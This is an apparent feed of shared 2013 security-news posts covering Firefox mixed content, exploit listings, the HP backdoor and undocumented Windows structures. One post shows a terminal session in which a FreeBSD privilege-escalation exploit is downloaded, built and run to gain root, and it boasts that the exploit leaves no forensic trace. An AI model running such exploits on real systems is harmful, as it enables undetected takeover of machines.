Buherator
Shared posts
29 Jun 09:42
Unix Guru Evi Nemeth Missing, Feared Lost At Sea
by Soulskill
14erCleaner writes "Retired Colorado professor Evi Nemeth has been missing between New Zealand and Australia since June 4, along with six others on their racing yacht. Nemeth, 73, is known as the primary author of the definitive Unix systems administration guide and for other works on Unix and Linux system administration and cryptography." 
Read more of this story at Slashdot.
Kschweri, Ronald.phillips likes this
28 Jun 12:12
Mixed Content Blocker hits Firefox Beta!
by Tanvi
The Mixed Content Blocker we described last month is now available in Firefox Beta and is on track for a general release in August with Firefox 23. When secure HTTPS pages load additional content insecurely over HTTP (a.k.a. Mixed Content), users are vulnerable to man-in-the-middle and eavesdropping attacks. The Mixed Content Blocker will block insecure active content by default, protecting our users from these attacks.
Call to Users – Report problems
If you find a website that isn’t functioning correctly because it contains insecure content that is being blocked by the Mixed Content Blocker, please let us know by sending an email to security@mozilla.org or commenting in our compatibility tracking bug
How can you tell if a site has Mixed Content that Firefox has blocked? Look for this Shield Icon in the location bar.
If you’d like to contribute further and help us find compatibility issues you can participate in our QA test day on Monday, July 1st.
Call to Web Developers – Test your site with Firefox Beta
If you rely on HTTP resources in your HTTPS pages this feature might break your website. If you do find Mixed Content issues on your webpage in Firefox 23+, chances are that the same issues exist in Chrome and/or Internet Explorer, who have also implemented this feature.
The best way to tell if your site will load correctly in Firefox 23 is to download the latest Firefox Beta and browse through your website with the Web Console open. Enable the “Security” messages in Web Console and check for messages about Mixed Content.
If you want to test your site in a more automated fashion, you can try using Skipfish, a web application security tool. Skipfish has a -M option that will report mixed content issues on your webpage.
To fix your site, simply replace http:// links with their https:// equivalents on your SSL pages. You can also use protocol-relative links if you use the same source code to serve your HTTP and HTTPS website.
If the Mixed Content resources on your page come from a third party, there is a chance that the HTTPS equivalent version already exists. For example, youtube.com has both HTTP and HTTPS video embed options. If the HTTPS version does not exist, consider contacting the third party (especially if they are one of your partners) and ask them to provide an HTTPS version of the content.
Call to Contributors – Contact Sites
We’ve been working on site compatibility issues, trying to find websites that are affected by the Mixed Content Blocker and alert them before Firefox 23 is released in August. However, finding accurate contact information for the affected sites has been a difficult task. And we could really use some help 
If you would like to contribute, please take a look at the list of affected sites and see if you can contact their website administrators and inform them of the Mixed Content compatibility issues that they are about to run into with Firefox 23 (and likely already have with Chrome or Internet Explorer). If you are able to find contact information and/or alert the website please let us know in the associated bug.
You can also help find more affected sites by participating in our QA test day on Monday, July 1st.
Want to Learn More?
Check out a more detailed blog post on this feature here.
Buherator likes this
27 Jun 14:46
Meet PRISM's English Little Brother: Socmint
by timothy
An anonymous reader writes with a story at Ars Technica, according to which "For the past two years, a secretive unit in the Metropolitan Police has been developing the tools for blanket surveillance of the public's social media conversations. Operating 24 hours a day, seven days a week, a staff of 17 officers in the National Domestic Extremism Unit (NDEU) has been scanning the public's tweets, YouTube videos, Facebook profiles, and anything else UK citizens post in the public online sphere. ... Surveillance operations often require a ministerial sign-off or permission from a superior, but it is unclear whether targeting of public social media data requires the same level of oversight, as head of research at Privacy International Eric King points out." 
Read more of this story at Slashdot.
27 Jun 07:39
[local] - FreeBSD 9 Address Space Manipulation Privilege Escalation
FreeBSD 9 Address Space Manipulation Privilege Escalation
27 Jun 07:39
[local] - ZPanel zsudo Local Privilege Escalation Exploit
ZPanel zsudo Local Privilege Escalation Exploit
27 Jun 07:39
[local] - Novell Client 2 SP3 nicm.sys Local Privilege Escalation
Novell Client 2 SP3 nicm.sys Local Privilege Escalation
27 Jun 07:38
Chrome Web Store Apps Now Automatically Scanned
by Candid Wueest
Google has started to scan newly uploaded applications and extensions in its Chrome Web Store, similar to what they already do in the Android Play Market.
We have written about quite a few cases where malicious extensions were pushed on social network users. Usually they claim to add a new functionality to the social network, like seeing who visited your profile. Not all of them are hosted on the official Chrome Web Store, so the new process will not stop all malicious extensions finding their way to the user. That being said, Symantec welcomes Google’s effort to remove malicious Chrome extensions as soon as possible and the improvements that were made to their automated system to help them detect items containing malware.
Malicious extensions for browsers are quite powerful. Once the user installs an extension and grants it permission, it can perform malicious tasks from within the browser. This can lead to man-in-the-browser (MITB) attacks with financial Trojans such as Zeus, swapping Web content, stealing passwords from login forms, or performing click-fraud in the background. At the moment, these malicious extensions are very popular with social networks scams. We wrote about the danger of malware in Firefox extensions in 2009 and this can also apply to Chrome extensions.
Figure 1. Malicious browser extension claiming additional feature
Regarding the malicious extensions that are being pushed on social media, be cautious when you see offers for free products on social networks, especially products that are highly sought after. If a feature is not currently available on a social network, chances are there is a reason that it is not available. Do not install browser extensions from unverified sources, even if they offer free products or access to an unavailable feature, and be especially suspicious of anything that is promoted aggressively on your social networks.
Buherator likes this
27 Jun 07:37
HP Confirms Backdoor In StoreOnce Backup Products
by timothy
wiredmikey writes "Security response personnel at HP are 'actively working on a fix' for a potentially dangerous backdoor in older versions of its StoreOnce backup product line. The company's confirmation of what it describes as a 'potential security issue' follows the public disclosure that malicious hackers can use SSH access to perform full remote compromise of HP's StoreOnce backup systems. The SHA1 hash for the password was also published, putting pressure on HP to get a fix ready for affected customers. SecurityWeek has confirmed that it is relatively trivial to brute-force the hash to obtain the seven-character password. The HP StoreOnce product, previously known as HP D2D, provides disk backup and recovery to small- to midsize businesses, large enterprises, remote offices and cloud service providers." 
Read more of this story at Slashdot.
27 Jun 07:36
Reader 9.x Reaches End-of-Life
by Karthik
In line with the Adobe Support Lifecycle Policy, Adobe’s Acrobat 9.x and Reader 9.x suite of products reached their end-of-life (EOL) today, June 26, 2013. This means that Adobe will no longer provide security or other updates to this product suite.
Over the years, we’ve made several security enhancements in the successors of Reader 9, Reader X and Reader XI, including the Protected Mode (aka “sandboxing”) and Protected View. There has never been a better time to upgrade to Reader XI. Please upgrade, ensure automatic updates are turned on, and stay secure!
Karthik Raman
Security Researcher, ASSET
Buherator likes this
27 Jun 07:34
Opera breached, has code cert stolen, possibly spreads malware - advice on what to do
by Paul Ducklin
Norwegian-based browser maker Opera has announced a network intrusion.
Users *may* have been infected with malware by an Opera update.
Paul Ducklin offers advice on what to do...
Buherator likes this
26 Jun 07:27
[remote] - HP System Management Homepage JustGetSNMPQueue Command Injection
HP System Management Homepage JustGetSNMPQueue Command Injection
26 Jun 07:27
[local] - Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
26 Jun 07:27
[remote] - ZPanel 10.0.0.2 htpasswd Module Username Command Execution
ZPanel 10.0.0.2 htpasswd Module Username Command Execution
26 Jun 07:23
Backdoor in HP backup servers
A hacker is claiming that the software on HP's StoreOnce series backup servers contains a backdoor. SSH access is all that's required to exploit the vulnerability
    
|
Buherator likes this
26 Jun 07:22
FreeBSD 9.{0,1} mmap/ptrace exploit V2: Clean-up version (no backdoor left)
by Hunger
Az eredeti exploit módosítva hagyta legtöbbször a támadáshoz használt suid root binárist, így mindig utána egyből rootot adott és az eredeti feladatát nem látta el a továbbiakban. Ez feltűnhet az üzemeltetőknek és kibukhat hash ellenőrzéskor, ezért ez az új változat már helyreállítja az eredeti állapotot, hogy ne maradjon nyom... :)
$ uname -a
FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ ftp -V http://hunger.hu/fbsd9lul2.c
$ gcc fbsd9lul2.c -o fbsd9lul2
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ ./fbsd9lul2
FreeBSD 9.{0,1} mmap/ptrace exploit V2
Clean-up version (no backdoor left)
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# exit
$ ls -la /sbin/ping
-r-sr-xr-x 1 root wheel 28008 Dec 4 2012 ping
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ /sbin/ping
usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
...
Buherator and -1 others like this
26 Jun 07:21
Backup program allows root access to LG smartphones
Security vulnerabilities in preinstalled backup software can be exploited to compromise LG Android smartphones
|
|
24 Jun 07:18
.biz DNSSEC DNSKEY is Invalid, (Sat, Jun 22nd)
We have received indication that the domain .biz DNSSEC DNSKEY is "bogus ...(more)...
24 Jun 07:17
Undocumented NtQuerySystemInformation Structures (Updated for Windows 8)
by Matt
Those familiar with Windows internals are likely to have used the NtQuerySystemInformation function in ntdll. This function is extremely valuable for getting system information that would otherwise not be made available via the Win32 API. The MSDN documentation only documents a minimal subset of the structures returned by this powerful function, however. To date, one of the best references for the undocumented features of this function has been the “Windows NT/2000 Native API Reference.” Despite being published in 2000, many of the structures documented in this book are still relevant today. In recent history though, Microsoft has quietly expanded the number of functions returned by NtQuerySystemInformation. Thankfully, the vast majority of them have been made public via symbols present in uxtheme.dll (64-bit structures) and combase.dll (32-bit) structures in Windows 8. At last check, it appears as though Microsoft pulled these symbols from the latest versions of the respective dlls.
I did my best to document these structures and fill in as many holes as possible in the SystemInformationClass enum. What resulted is the following image – a mapping of SystemInformationClass constants to their respective 32-bit structure and a header file – NtQuerySystemInformation.h. I validated that the header file is properly parsed by IDA (Ctrl+F9). To view the result of what was parsed in IDA, press Shift+F1 (Local Types Subview). The most notable structures are the ones that return pointers. In many cases, these are pointers to kernel memory. >D
enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation=0x0000,
SystemProcessorInformation=0x0001,
SystemPerformanceInformation=0x0002,
SystemTimeOfDayInformation=0x0003,
SystemPathInformation=0x0004,
SystemProcessInformation=0x0005,
SystemCallCountInformation=0x0006,
SystemDeviceInformation=0x0007,
SystemProcessorPerformanceInformation=0x0008,
SystemFlagsInformation=0x0009,
SystemCallTimeInformation=0x000A,
SystemModuleInformation=0x000B,
SystemLocksInformation=0x000C,
SystemStackTraceInformation=0x000D,
SystemPagedPoolInformation=0x000E,
SystemNonPagedPoolInformation=0x000F,
SystemHandleInformation=0x0010,
SystemObjectInformation=0x0011,
SystemPageFileInformation=0x0012,
SystemVdmInstemulInformation=0x0013,
SystemVdmBopInformation=0x0014,
SystemFileCacheInformation=0x0015,
SystemPoolTagInformation=0x0016,
SystemInterruptInformation=0x0017,
SystemDpcBehaviorInformation=0x0018,
SystemFullMemoryInformation=0x0019,
SystemLoadGdiDriverInformation=0x001A,
SystemUnloadGdiDriverInformation=0x001B,
SystemTimeAdjustmentInformation=0x001C,
SystemSummaryMemoryInformation=0x001D,
SystemMirrorMemoryInformation=0x001E,
SystemPerformanceTraceInformation=0x001F,
SystemCrashDumpInformation=0x0020,
SystemExceptionInformation=0x0021,
SystemCrashDumpStateInformation=0x0022,
SystemKernelDebuggerInformation=0x0023,
SystemContextSwitchInformation=0x0024,
SystemRegistryQuotaInformation=0x0025,
SystemExtendServiceTableInformation=0x0026,
SystemPrioritySeperation=0x0027,
SystemVerifierAddDriverInformation=0x0028,
SystemVerifierRemoveDriverInformation=0x0029,
SystemProcessorIdleInformation=0x002A,
SystemLegacyDriverInformation=0x002B,
SystemCurrentTimeZoneInformation=0x002C,
SystemLookasideInformation=0x002D,
SystemTimeSlipNotification=0x002E,
SystemSessionCreate=0x002F,
SystemSessionDetach=0x0030,
SystemSessionInformation=0x0031,
SystemRangeStartInformation=0x0032,
SystemVerifierInformation=0x0033,
SystemVerifierThunkExtend=0x0034,
SystemSessionProcessInformation=0x0035,
SystemLoadGdiDriverInSystemSpace=0x0036,
SystemNumaProcessorMap=0x0037,
SystemPrefetcherInformation=0x0038,
SystemExtendedProcessInformation=0x0039,
SystemRecommendedSharedDataAlignment=0x003A,
SystemComPlusPackage=0x003B,
SystemNumaAvailableMemory=0x003C,
SystemProcessorPowerInformation=0x003D,
SystemEmulationBasicInformation=0x003E,
SystemEmulationProcessorInformation=0x003F,
SystemExtendedHandleInformation=0x0040,
SystemLostDelayedWriteInformation=0x0041,
SystemBigPoolInformation=0x0042,
SystemSessionPoolTagInformation=0x0043,
SystemSessionMappedViewInformation=0x0044,
SystemHotpatchInformation=0x0045,
SystemObjectSecurityMode=0x0046,
SystemWatchdogTimerHandler=0x0047,
SystemWatchdogTimerInformation=0x0048,
SystemLogicalProcessorInformation=0x0049,
SystemWow64SharedInformationObsolete=0x004A,
SystemRegisterFirmwareTableInformationHandler=0x004B,
SystemFirmwareTableInformation=0x004C,
SystemModuleInformationEx=0x004D,
SystemVerifierTriageInformation=0x004E,
SystemSuperfetchInformation=0x004F,
SystemMemoryListInformation=0x0050,
SystemFileCacheInformationEx=0x0051,
SystemThreadPriorityClientIdInformation=0x0052,
SystemProcessorIdleCycleTimeInformation=0x0053,
SystemVerifierCancellationInformation=0x0054,
SystemProcessorPowerInformationEx=0x0055,
SystemRefTraceInformation=0x0056,
SystemSpecialPoolInformation=0x0057,
SystemProcessIdInformation=0x0058,
SystemErrorPortInformation=0x0059,
SystemBootEnvironmentInformation=0x005A,
SystemHypervisorInformation=0x005B,
SystemVerifierInformationEx=0x005C,
SystemTimeZoneInformation=0x005D,
SystemImageFileExecutionOptionsInformation=0x005E,
SystemCoverageInformation=0x005F,
SystemPrefetchPatchInformation=0x0060,
SystemVerifierFaultsInformation=0x0061,
SystemSystemPartitionInformation=0x0062,
SystemSystemDiskInformation=0x0063,
SystemProcessorPerformanceDistribution=0x0064,
SystemNumaProximityNodeInformation=0x0065,
SystemDynamicTimeZoneInformation=0x0066,
SystemCodeIntegrityInformation=0x0067,
SystemProcessorMicrocodeUpdateInformation=0x0068,
SystemProcessorBrandString=0x0069,
SystemVirtualAddressInformation=0x006A,
SystemLogicalProcessorAndGroupInformation=0x006B,
SystemProcessorCycleTimeInformation=0x006C,
SystemStoreInformation=0x006D,
SystemRegistryAppendString=0x006E,
SystemAitSamplingValue=0x006F,
SystemVhdBootInformation=0x0070,
SystemCpuQuotaInformation=0x0071,
SystemNativeBasicInformation=0x0072,
SystemErrorPortTimeouts=0x0073,
SystemLowPriorityIoInformation=0x0074,
SystemBootEntropyInformation=0x0075,
SystemVerifierCountersInformation=0x0076,
SystemPagedPoolInformationEx=0x0077,
SystemSystemPtesInformationEx=0x0078,
SystemNodeDistanceInformation=0x0079,
SystemAcpiAuditInformation=0x007A,
SystemBasicPerformanceInformation=0x007B,
SystemQueryPerformanceCounterInformation=0x007C,
SystemSessionBigPoolInformation=0x007D,
SystemBootGraphicsInformation=0x007E,
SystemScrubPhysicalMemoryInformation=0x007F,
SystemBadPageInformation=0x0080,
SystemProcessorProfileControlArea=0x0081,
SystemCombinePhysicalMemoryInformation=0x0082,
SystemEntropyInterruptTimingInformation=0x0083,
SystemConsoleInformation=0x0084,
SystemPlatformBinaryInformation=0x0085,
SystemThrottleNotificationInformation=0x0086,
SystemHypervisorProcessorCountInformation=0x0087,
SystemDeviceDataInformation=0x0088,
SystemDeviceDataEnumerationInformation=0x0089,
SystemMemoryTopologyInformation=0x008A,
SystemMemoryChannelInformation=0x008B,
SystemBootLogoInformation=0x008C,
SystemProcessorPerformanceInformationEx=0x008D,
SystemSpare0=0x008E,
SystemSecureBootPolicyInformation=0x008F,
SystemPageFileInformationEx=0x0090,
SystemSecureBootInformation=0x0091,
SystemEntropyInterruptTimingRawInformation=0x0092,
SystemPortableWorkspaceEfiLauncherInformation=0x0093,
SystemFullProcessInformation=0x0094,
MaxSystemInfoClass=0x0095
};
typedef unsigned short USHORT, *USHORT_PTR;
typedef PVOID HANDLE;
typedef struct _UNICODE_STRING // Size=8
{
USHORT Length; // Size=2 Offset=0
USHORT MaximumLength; // Size=2 Offset=2
USHORT_PTR Buffer; // Size=4 Offset=4
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _LARGE_INTEGER // Size=8
{
ULONG LowPart; // Size=4 Offset=0
LONG HighPart; // Size=4 Offset=4
} LARGE_INTEGER;
typedef struct _GENERIC_MAPPING // Size=16
{
ULONG GenericRead; // Size=4 Offset=0
ULONG GenericWrite; // Size=4 Offset=4
ULONG GenericExecute; // Size=4 Offset=8
ULONG GenericAll; // Size=4 Offset=12
} GENERIC_MAPPING;
struct _SYSTEM_BASIC_INFORMATION // Size=44
{
ULONG Reserved; // Size=4 Offset=0
ULONG TimerResolution; // Size=4 Offset=4
ULONG PageSize; // Size=4 Offset=8
ULONG NumberOfPhysicalPages; // Size=4 Offset=12
ULONG LowestPhysicalPageNumber; // Size=4 Offset=16
ULONG HighestPhysicalPageNumber; // Size=4 Offset=20
ULONG AllocationGranularity; // Size=4 Offset=24
ULONG MinimumUserModeAddress; // Size=4 Offset=28
ULONG MaximumUserModeAddress; // Size=4 Offset=32
ULONG ActiveProcessorsAffinityMask; // Size=4 Offset=36
UCHAR NumberOfProcessors; // Size=1 Offset=40
};
struct _SYSTEM_PROCESSOR_INFORMATION // Size=12
{
USHORT ProcessorArchitecture; // Size=2 Offset=0
USHORT ProcessorLevel; // Size=2 Offset=2
USHORT ProcessorRevision; // Size=2 Offset=4
USHORT MaximumProcessors; // Size=2 Offset=6
ULONG ProcessorFeatureBits; // Size=4 Offset=8
};
struct _SYSTEM_PERFORMANCE_INFORMATION // Size=344
{
LARGE_INTEGER IdleProcessTime; // Size=8 Offset=0
LARGE_INTEGER IoReadTransferCount; // Size=8 Offset=8
LARGE_INTEGER IoWriteTransferCount; // Size=8 Offset=16
LARGE_INTEGER IoOtherTransferCount; // Size=8 Offset=24
ULONG IoReadOperationCount; // Size=4 Offset=32
ULONG IoWriteOperationCount; // Size=4 Offset=36
ULONG IoOtherOperationCount; // Size=4 Offset=40
ULONG AvailablePages; // Size=4 Offset=44
ULONG CommittedPages; // Size=4 Offset=48
ULONG CommitLimit; // Size=4 Offset=52
ULONG PeakCommitment; // Size=4 Offset=56
ULONG PageFaultCount; // Size=4 Offset=60
ULONG CopyOnWriteCount; // Size=4 Offset=64
ULONG TransitionCount; // Size=4 Offset=68
ULONG CacheTransitionCount; // Size=4 Offset=72
ULONG DemandZeroCount; // Size=4 Offset=76
ULONG PageReadCount; // Size=4 Offset=80
ULONG PageReadIoCount; // Size=4 Offset=84
ULONG CacheReadCount; // Size=4 Offset=88
ULONG CacheIoCount; // Size=4 Offset=92
ULONG DirtyPagesWriteCount; // Size=4 Offset=96
ULONG DirtyWriteIoCount; // Size=4 Offset=100
ULONG MappedPagesWriteCount; // Size=4 Offset=104
ULONG MappedWriteIoCount; // Size=4 Offset=108
ULONG PagedPoolPages; // Size=4 Offset=112
ULONG NonPagedPoolPages; // Size=4 Offset=116
ULONG PagedPoolAllocs; // Size=4 Offset=120
ULONG PagedPoolFrees; // Size=4 Offset=124
ULONG NonPagedPoolAllocs; // Size=4 Offset=128
ULONG NonPagedPoolFrees; // Size=4 Offset=132
ULONG FreeSystemPtes; // Size=4 Offset=136
ULONG ResidentSystemCodePage; // Size=4 Offset=140
ULONG TotalSystemDriverPages; // Size=4 Offset=144
ULONG TotalSystemCodePages; // Size=4 Offset=148
ULONG NonPagedPoolLookasideHits; // Size=4 Offset=152
ULONG PagedPoolLookasideHits; // Size=4 Offset=156
ULONG AvailablePagedPoolPages; // Size=4 Offset=160
ULONG ResidentSystemCachePage; // Size=4 Offset=164
ULONG ResidentPagedPoolPage; // Size=4 Offset=168
ULONG ResidentSystemDriverPage; // Size=4 Offset=172
ULONG CcFastReadNoWait; // Size=4 Offset=176
ULONG CcFastReadWait; // Size=4 Offset=180
ULONG CcFastReadResourceMiss; // Size=4 Offset=184
ULONG CcFastReadNotPossible; // Size=4 Offset=188
ULONG CcFastMdlReadNoWait; // Size=4 Offset=192
ULONG CcFastMdlReadWait; // Size=4 Offset=196
ULONG CcFastMdlReadResourceMiss; // Size=4 Offset=200
ULONG CcFastMdlReadNotPossible; // Size=4 Offset=204
ULONG CcMapDataNoWait; // Size=4 Offset=208
ULONG CcMapDataWait; // Size=4 Offset=212
ULONG CcMapDataNoWaitMiss; // Size=4 Offset=216
ULONG CcMapDataWaitMiss; // Size=4 Offset=220
ULONG CcPinMappedDataCount; // Size=4 Offset=224
ULONG CcPinReadNoWait; // Size=4 Offset=228
ULONG CcPinReadWait; // Size=4 Offset=232
ULONG CcPinReadNoWaitMiss; // Size=4 Offset=236
ULONG CcPinReadWaitMiss; // Size=4 Offset=240
ULONG CcCopyReadNoWait; // Size=4 Offset=244
ULONG CcCopyReadWait; // Size=4 Offset=248
ULONG CcCopyReadNoWaitMiss; // Size=4 Offset=252
ULONG CcCopyReadWaitMiss; // Size=4 Offset=256
ULONG CcMdlReadNoWait; // Size=4 Offset=260
ULONG CcMdlReadWait; // Size=4 Offset=264
ULONG CcMdlReadNoWaitMiss; // Size=4 Offset=268
ULONG CcMdlReadWaitMiss; // Size=4 Offset=272
ULONG CcReadAheadIos; // Size=4 Offset=276
ULONG CcLazyWriteIos; // Size=4 Offset=280
ULONG CcLazyWritePages; // Size=4 Offset=284
ULONG CcDataFlushes; // Size=4 Offset=288
ULONG CcDataPages; // Size=4 Offset=292
ULONG ContextSwitches; // Size=4 Offset=296
ULONG FirstLevelTbFills; // Size=4 Offset=300
ULONG SecondLevelTbFills; // Size=4 Offset=304
ULONG SystemCalls; // Size=4 Offset=308
ULONGLONG CcTotalDirtyPages; // Size=8 Offset=312
ULONGLONG CcDirtyPageThreshold; // Size=8 Offset=320
LONGLONG ResidentAvailablePages; // Size=8 Offset=328
ULONGLONG SharedCommittedPages; // Size=8 Offset=336
};
struct _SYSTEM_TIMEOFDAY_INFORMATION // Size=48
{
LARGE_INTEGER BootTime; // Size=8 Offset=0
LARGE_INTEGER CurrentTime; // Size=8 Offset=8
LARGE_INTEGER TimeZoneBias; // Size=8 Offset=16
ULONG TimeZoneId; // Size=4 Offset=24
ULONG Reserved; // Size=4 Offset=28
ULONGLONG BootTimeBias; // Size=8 Offset=32
ULONGLONG SleepTimeBias; // Size=8 Offset=40
};
typedef struct _SYSTEM_PROCESS_INFORMATION // Size=184
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG NumberOfThreads; // Size=4 Offset=4
LARGE_INTEGER WorkingSetPrivateSize; // Size=8 Offset=8
ULONG HardFaultCount; // Size=4 Offset=16
ULONG NumberOfThreadsHighWatermark; // Size=4 Offset=20
ULONGLONG CycleTime; // Size=8 Offset=24
LARGE_INTEGER CreateTime; // Size=8 Offset=32
LARGE_INTEGER UserTime; // Size=8 Offset=40
LARGE_INTEGER KernelTime; // Size=8 Offset=48
UNICODE_STRING ImageName; // Size=8 Offset=56
LONG BasePriority; // Size=4 Offset=64
PVOID UniqueProcessId; // Size=4 Offset=68
PVOID InheritedFromUniqueProcessId; // Size=4 Offset=72
ULONG HandleCount; // Size=4 Offset=76
ULONG SessionId; // Size=4 Offset=80
ULONG UniqueProcessKey; // Size=4 Offset=84
ULONG PeakVirtualSize; // Size=4 Offset=88
ULONG VirtualSize; // Size=4 Offset=92
ULONG PageFaultCount; // Size=4 Offset=96
ULONG PeakWorkingSetSize; // Size=4 Offset=100
ULONG WorkingSetSize; // Size=4 Offset=104
ULONG QuotaPeakPagedPoolUsage; // Size=4 Offset=108
ULONG QuotaPagedPoolUsage; // Size=4 Offset=112
ULONG QuotaPeakNonPagedPoolUsage; // Size=4 Offset=116
ULONG QuotaNonPagedPoolUsage; // Size=4 Offset=120
ULONG PagefileUsage; // Size=4 Offset=124
ULONG PeakPagefileUsage; // Size=4 Offset=128
ULONG PrivatePageCount; // Size=4 Offset=132
LARGE_INTEGER ReadOperationCount; // Size=8 Offset=136
LARGE_INTEGER WriteOperationCount; // Size=8 Offset=144
LARGE_INTEGER OtherOperationCount; // Size=8 Offset=152
LARGE_INTEGER ReadTransferCount; // Size=8 Offset=160
LARGE_INTEGER WriteTransferCount; // Size=8 Offset=168
LARGE_INTEGER OtherTransferCount; // Size=8 Offset=176
} SYSTEM_PROCESS_INFORMATION;
struct _SYSTEM_CALL_COUNT_INFORMATION // Size=8
{
ULONG Length; // Size=4 Offset=0
ULONG NumberOfTables; // Size=4 Offset=4
};
struct _SYSTEM_DEVICE_INFORMATION // Size=24
{
ULONG NumberOfDisks; // Size=4 Offset=0
ULONG NumberOfFloppies; // Size=4 Offset=4
ULONG NumberOfCdRoms; // Size=4 Offset=8
ULONG NumberOfTapes; // Size=4 Offset=12
ULONG NumberOfSerialPorts; // Size=4 Offset=16
ULONG NumberOfParallelPorts; // Size=4 Offset=20
};
struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION // Size=48
{
LARGE_INTEGER IdleTime; // Size=8 Offset=0
LARGE_INTEGER KernelTime; // Size=8 Offset=8
LARGE_INTEGER UserTime; // Size=8 Offset=16
LARGE_INTEGER DpcTime; // Size=8 Offset=24
LARGE_INTEGER InterruptTime; // Size=8 Offset=32
ULONG InterruptCount; // Size=4 Offset=40
};
typedef enum _SYSTEM_GLOBAL_FLAGS
{
FLG_DISABLE_DBGPRINT=0x08000000,
FLG_KERNEL_STACK_TRACE_DB=0x00002000,
FLG_USER_STACK_TRACE_DB=0x00001000,
FLG_DEBUG_INITIAL_COMMAND=0x00000004,
FLG_DEBUG_INITIAL_COMMAND_EX=0x04000000,
FLG_HEAP_DISABLE_COALESCING=0x00200000,
FLG_DISABLE_PAGE_KERNEL_STACKS=0x00080000,
FLG_DISABLE_PROTDLLS=0x80000000,
FLG_DISABLE_STACK_EXTENSION=0x00010000,
FLG_CRITSEC_EVENT_CREATION=0x10000000,
FLG_APPLICATION_VERIFIER=0x00000100,
FLG_ENABLE_HANDLE_EXCEPTIONS=0x40000000,
FLG_ENABLE_CLOSE_EXCEPTIONS=0x00400000,
FLG_ENABLE_CSRDEBUG=0x00020000,
FLG_ENABLE_EXCEPTION_LOGGING=0x00800000,
FLG_HEAP_ENABLE_FREE_CHECK=0x00000020,
FLG_HEAP_VALIDATE_PARAMETERS=0x00000040,
FLG_HEAP_ENABLE_TAGGING=0x00000800,
FLG_HEAP_ENABLE_TAG_BY_DLL=0x00008000,
FLG_HEAP_ENABLE_TAIL_CHECK=0x00000010,
FLG_HEAP_VALIDATE_ALL=0x00000080,
FLG_ENABLE_KDEBUG_SYMBOL_LOAD=0x00040000,
FLG_ENABLE_HANDLE_TYPE_TAGGING=0x01000000,
FLG_HEAP_PAGE_ALLOCS=0x02000000,
FLG_POOL_ENABLE_TAGGING=0x00000400,
FLG_ENABLE_SYSTEM_CRIT_BREAKS=0x00100000,
FLG_MAINTAIN_OBJECT_TYPELIST=0x00004000,
FLG_MONITOR_SILENT_PROCESS_EXIT=0x00000200,
FLG_SHOW_LDR_SNAPS=0x00000002,
FLG_STOP_ON_EXCEPTION=0x00000001,
FLG_STOP_ON_HUNG_GUI=0x00000008
} SYSTEM_GLOBAL_FLAGS;
struct _SYSTEM_FLAGS_INFORMATION // Size=4
{
SYSTEM_GLOBAL_FLAGS Flags; // Size=4 Offset=0
};
struct _SYSTEM_CALL_TIME_INFORMATION // Size=16
{
ULONG Length; // Size=4 Offset=0
ULONG TotalCalls; // Size=4 Offset=4
LARGE_INTEGER TimeOfCalls[1]; // Size=8 Offset=8
};
typedef struct _SYSTEM_MODULE // Size=280
{
USHORT Reserved1; // Size=2 Offset=0
USHORT Reserved2; // Size=2 Offset=2
ULONG ImageBaseAddress; // Size=4 Offset=4
ULONG ImageSize; // Size=4 Offset=8
ULONG Flags; // Size=4 Offset=12
USHORT Index; // Size=2 Offset=16
USHORT Rank; // Size=2 Offset=18
USHORT LoadCount; // Size=2 Offset=20
USHORT NameOffset; // Size=2 Offset=22
UCHAR Name[256]; // Size=256 Offset=24
} SYSTEM_MODULE;
struct _SYSTEM_MODULE_INFORMATION // Size=284
{
ULONG Count; // Size=4 Offset=0
SYSTEM_MODULE Modules[1]; // Size=280 Offset=4
};
typedef struct _SYSTEM_LOCK // Size=36
{
PVOID Address; // Size=4 Offset=0
USHORT Type; // Size=2 Offset=4
USHORT Reserved1; // Size=2 Offset=6
ULONG ExclusiveOwnerThreadId; // Size=4 Offset=8
ULONG ActiveCount; // Size=4 Offset=12
ULONG ContentionCount; // Size=4 Offset=16
ULONG Reserved2[2]; // Size=8 Offset=20
ULONG NumberOfSharedWaiters; // Size=4 Offset=28
ULONG NumberOfExclusiveWaiters; // Size=4 Offset=32
} SYSTEM_LOCK;
struct _SYSTEM_LOCK_INFORMATION // Size=40
{
ULONG Count; // Size=4 Offset=0
SYSTEM_LOCK Locks[1]; // Size=36 Offset=4
};
typedef enum _SYSTEM_HANDLE_FLAGS
{
PROTECT_FROM_CLOSE=1,
INHERIT=2
} SYSTEM_HANDLE_FLAGS;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO // Size=16
{
USHORT UniqueProcessId; // Size=2 Offset=0
USHORT CreatorBackTraceIndex; // Size=2 Offset=2
UCHAR ObjectTypeIndex; // Size=1 Offset=4
SYSTEM_HANDLE_FLAGS HandleAttributes; // Size=1 Offset=5
USHORT HandleValue; // Size=2 Offset=6
PVOID Object; // Size=4 Offset=8
ULONG GrantedAccess; // Size=4 Offset=12
} SYSTEM_HANDLE_TABLE_ENTRY_INFO;
struct _SYSTEM_HANDLE_INFORMATION // Size=20
{
ULONG NumberOfHandles; // Size=4 Offset=0
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; // Size=16 Offset=4
};
struct _SYSTEM_OBJECTTYPE_INFORMATION // Size=56
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG NumberOfObjects; // Size=4 Offset=4
ULONG NumberOfHandles; // Size=4 Offset=8
ULONG TypeIndex; // Size=4 Offset=12
ULONG InvalidAttributes; // Size=4 Offset=16
GENERIC_MAPPING GenericMapping; // Size=16 Offset=20
ULONG ValidAccessMask; // Size=4 Offset=36
ULONG PoolType; // Size=4 Offset=40
